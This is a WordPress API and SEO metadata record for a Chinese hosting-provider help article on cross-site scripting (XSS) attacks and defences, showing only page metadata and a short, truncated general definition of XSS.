property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-26T06:17:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061729-697706f9e43b5.webp\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 \u5206\" \/>\n<script type=\"application\/ld+json\" 
class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/66258.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/66258.html\",\"name\":\"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2026-01-26T06:17:31+00:00\",\"dateModified\":\"2026-01-26T06:17:31+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/66258.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/66258.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/66258.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required 
name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/66258.html","og_locale":"zh_CN","og_type":"article","og_title":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"XSS\u653b\u51fb\u8be6\u89e3 1. 
XSS\u653b\u51fb\u6982\u8ff0 XSS&#xff08;Cross-Site Scripting&#xff0c;\u8de8\u7ad9\u811a\u672c\u653b\u51fb&#xff09; \u662f\u4e00\u79cd\u5c06\u6076\u610f\u811a\u672c\u6ce8\u5165\u5230\u53ef\u4fe1\u7f51\u7ad9\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728Web\u9875\u9762\u4e2d\u63d2\u5165\u6076\u610f\u811a\u672c&#xff0c;\u5f53\u5176\u4ed6\u7528\u6237\u6d4f\u89c8\u8be5\u9875\u9762\u65f6&#xff0c;\u811a\u672c\u4f1a\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u3002 \u5173\u952e\u7279\u5f81&#xff1a; \u653b\u51fb\u53d1\u751f\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u5229\u7528\u7f51\u7ad9\u5bf9\u7528\u6237\u8f93\u5165\u7684\u4fe1\u4efb\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565&#xff08;SOP&#xff09;\u7684\u9650\u5236\u5f71\u54cd\u8303\u56f4\u5e7f\u6cdb&#xff1a;\u7a83\u53d6Co","og_url":"https:\/\/www.wsisp.com\/helps\/66258.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2026-01-26T06:17:31+00:00","og_image":[{"url":"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061729-697706f9e43b5.webp"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"4 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/66258.html","url":"https:\/\/www.wsisp.com\/helps\/66258.html","name":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - 
\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2026-01-26T06:17:31+00:00","dateModified":"2026-01-26T06:17:31+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/66258.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/66258.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/66258.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required 
name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/66258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=66258"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/66258\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media\/66257"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=66258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=66258"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=66258"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=66258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}